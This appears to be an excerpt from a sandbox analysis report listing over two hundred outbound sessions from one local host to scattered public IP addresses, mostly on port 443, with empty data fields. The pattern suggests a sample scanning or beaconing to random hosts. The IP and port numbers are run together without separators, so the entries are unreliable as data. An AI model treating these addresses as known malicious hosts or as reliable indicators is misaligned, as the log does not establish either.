                                            26107192.168.2.2354378197.20.226.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26108192.168.2.2359864154.92.146.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26109192.168.2.2346306187.189.120.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26110192.168.2.234170020.146.81.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26111192.168.2.2343582148.228.104.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26112192.168.2.2345676220.97.4.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26113192.168.2.235331280.145.80.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26114192.168.2.235798461.79.163.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26115192.168.2.2353546193.19.33.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26116192.168.2.2349702210.209.124.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26117192.168.2.235592625.73.27.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26118192.168.2.2346182133.71.232.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26119192.168.2.235033854.216.186.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26120192.168.2.2342226187.241.47.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26121192.168.2.2343038137.115.231.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26122192.168.2.234619254.104.51.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26123192.168.2.234807689.111.251.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26124192.168.2.235619836.135.227.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26125192.168.2.233975019.237.206.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26126192.168.2.2345894151.205.126.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26127192.168.2.2333906177.33.56.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26128192.168.2.2334806124.60.23.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26129192.168.2.2344420187.246.184.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26130192.168.2.2359000180.9.86.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26131192.168.2.234884697.226.246.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26132192.168.2.2348394178.16.103.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26133192.168.2.236014670.104.247.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26134192.168.2.2335634204.143.134.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26135192.168.2.2338990223.157.184.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26136192.168.2.2350712131.153.61.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26137192.168.2.2358510113.59.125.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26138192.168.2.233414697.250.86.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26139192.168.2.2345906142.179.239.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26140192.168.2.234513276.241.160.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26141192.168.2.233809437.124.89.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26142192.168.2.235783224.11.6.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26143192.168.2.2359376192.160.213.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26144192.168.2.2355572185.231.63.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26145192.168.2.2357418212.24.106.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26146192.168.2.234559889.158.236.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26147192.168.2.235920845.80.147.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26148192.168.2.2350300216.60.181.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26149192.168.2.233913491.57.50.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26150192.168.2.233342420.218.96.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26151192.168.2.2334500199.84.46.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26152192.168.2.2351668160.122.67.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26153192.168.2.233905663.57.250.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26154192.168.2.234888451.108.211.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26155192.168.2.2338374200.117.236.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26156192.168.2.2358492141.63.198.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26157192.168.2.2357728204.149.6.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26158192.168.2.235167490.92.167.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26159192.168.2.2357156137.47.134.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26160192.168.2.2356038108.231.102.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26161192.168.2.235652070.49.18.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26162192.168.2.236082677.77.68.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26163192.168.2.2355186116.236.145.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26164192.168.2.2338316132.200.6.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26165192.168.2.2335600170.152.110.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26166192.168.2.2358586128.150.146.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26167192.168.2.2332934113.10.104.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26168192.168.2.2360078115.153.48.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26169192.168.2.234653872.85.178.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26170192.168.2.2347742128.231.144.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26171192.168.2.2342794222.193.226.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26172192.168.2.2356372219.226.249.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26173192.168.2.235968480.85.6.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26174192.168.2.234222697.162.173.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26175192.168.2.234719881.58.79.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26176192.168.2.2355020157.115.157.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26177192.168.2.235860493.16.92.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26178192.168.2.235568274.205.50.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26179192.168.2.2354868164.199.181.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26180192.168.2.2355232109.19.3.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26181192.168.2.2346244129.250.52.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26182192.168.2.233768672.173.3.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26183192.168.2.234628024.199.185.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26184192.168.2.235428639.42.131.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26185192.168.2.2351846217.147.69.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26186192.168.2.2349318135.57.134.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26187192.168.2.2335760165.86.218.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26188192.168.2.2343552116.26.253.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26189192.168.2.2333064187.240.152.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26190192.168.2.235156480.251.174.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26191192.168.2.235642279.169.55.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26192192.168.2.2349750114.28.228.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26193192.168.2.234531290.17.92.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26194192.168.2.2335404222.18.108.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26195192.168.2.2342826102.208.29.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26196192.168.2.234063245.212.60.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26197192.168.2.2333418143.13.130.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26198192.168.2.2360020102.28.93.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26199192.168.2.235028068.235.30.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26200192.168.2.234743249.163.102.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26201192.168.2.234683820.42.64.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26202192.168.2.2339744176.203.96.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26203192.168.2.2336942139.9.109.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26204192.168.2.2349710174.84.123.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26205192.168.2.2358302131.60.121.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26206192.168.2.2335718142.164.85.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26207192.168.2.233340818.152.102.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26208192.168.2.233724276.193.170.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26209192.168.2.2342300135.58.151.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26210192.168.2.2334460139.244.21.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26211192.168.2.233608457.75.72.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26212192.168.2.234985849.157.237.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26213192.168.2.2358814106.42.122.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26214192.168.2.2354758140.201.170.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26215192.168.2.235517890.249.79.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26216192.168.2.2342548191.129.16.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26217192.168.2.233763624.215.169.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26218192.168.2.2351406216.173.208.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26219192.168.2.235341281.228.212.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26220192.168.2.2348658128.20.126.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26221192.168.2.2341384166.44.213.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26222192.168.2.2344934123.89.82.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26223192.168.2.2336016134.218.249.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26224192.168.2.235322878.163.126.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26225192.168.2.235663625.66.159.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26226192.168.2.233842852.121.136.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26227192.168.2.2334434178.206.244.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26228192.168.2.233495475.223.179.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26229192.168.2.2336498189.112.161.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26230192.168.2.235370014.189.229.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26231192.168.2.235292098.106.174.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26232192.168.2.236070242.88.143.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26233192.168.2.2341298209.19.18.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26234192.168.2.235244248.191.81.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26235192.168.2.234966470.125.169.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26236192.168.2.2357456206.244.24.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26237192.168.2.233947251.221.85.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26238192.168.2.2346332153.80.219.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26239192.168.2.2343110156.73.203.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26240192.168.2.233464258.255.77.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26241192.168.2.234595072.183.95.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26242192.168.2.2345874156.77.55.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26243192.168.2.2337892222.115.207.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26244192.168.2.2341290104.156.200.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26245192.168.2.2359268159.74.236.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26246192.168.2.2349122110.242.99.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26247192.168.2.2359950200.121.174.148080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26248192.168.2.2344430192.130.20.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26249192.168.2.2343010200.112.0.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26250192.168.2.2356126194.139.91.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26251192.168.2.234805420.121.208.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26252192.168.2.2339152182.235.20.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26253192.168.2.2346424216.160.235.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26254192.168.2.2349894121.224.157.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26255192.168.2.2338100194.58.128.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26256192.168.2.2352694119.203.238.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26257192.168.2.2347906175.166.181.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26258192.168.2.2346226179.1.78.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26259192.168.2.2342108146.138.75.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26260192.168.2.235027643.163.82.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26261192.168.2.2348836218.63.206.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26262192.168.2.2347872114.159.195.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26263192.168.2.2332928122.204.60.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26264192.168.2.2342860111.118.59.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26265192.168.2.2351156153.229.237.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26266192.168.2.2345044209.181.23.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26267192.168.2.234975896.139.147.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26268192.168.2.2348110132.161.197.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26269192.168.2.2343602140.195.26.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26270192.168.2.2337580218.145.41.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26271192.168.2.233839468.53.255.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26272192.168.2.2342070136.108.27.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26273192.168.2.235380849.225.7.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26274192.168.2.2336276157.250.219.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26275192.168.2.233646465.111.106.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26276192.168.2.235764642.8.43.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26277192.168.2.2352886204.28.135.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26278192.168.2.2338338130.166.12.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26279192.168.2.235144886.49.56.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26280192.168.2.2343880144.67.97.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26281192.168.2.233438485.132.177.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26282192.168.2.2336262142.201.87.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26283192.168.2.234493463.171.164.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26284192.168.2.235080658.0.238.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26285192.168.2.233624212.98.1.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26286192.168.2.2335966197.175.14.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26287192.168.2.234477646.46.160.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26288192.168.2.234569859.142.135.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26289192.168.2.2349326148.63.52.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26290192.168.2.234019820.5.225.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26291192.168.2.2356432144.50.112.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26292192.168.2.235903214.123.13.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26293192.168.2.2359018129.198.215.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26294192.168.2.2345556143.133.0.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26295192.168.2.2347330176.25.216.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26296192.168.2.234359063.17.5.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26297192.168.2.235322889.187.8.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26298192.168.2.2338988112.175.210.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26299192.168.2.234035470.127.199.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26300192.168.2.2345302210.129.25.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26301192.168.2.23377928.68.133.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26302192.168.2.2350666213.221.78.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26303192.168.2.2354394106.25.91.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26304192.168.2.233484899.30.51.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26305192.168.2.234186434.36.227.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26306192.168.2.234989282.63.192.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26307192.168.2.2359208157.109.198.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26308192.168.2.2351478184.146.212.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26309192.168.2.2342418124.208.107.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26310192.168.2.2341144210.163.135.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26311192.168.2.2355392129.143.199.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26312192.168.2.233517684.209.240.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26313192.168.2.233967292.4.157.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26314192.168.2.2339902120.223.112.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26315192.168.2.235230866.227.71.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26316192.168.2.2357504172.61.192.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26317192.168.2.235228489.91.47.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26318192.168.2.2358540197.39.177.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26319192.168.2.233775217.140.203.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26320192.168.2.234088090.162.116.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26321192.168.2.2338358223.112.3.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26322192.168.2.2340320162.219.71.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26323192.168.2.2357532110.175.129.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26324192.168.2.2337984209.59.149.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26325192.168.2.2340688172.75.221.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26326192.168.2.233779036.108.125.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26327192.168.2.235617836.131.64.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26328192.168.2.233366045.63.88.109443
                                            TimestampBytes transferredDirectionData


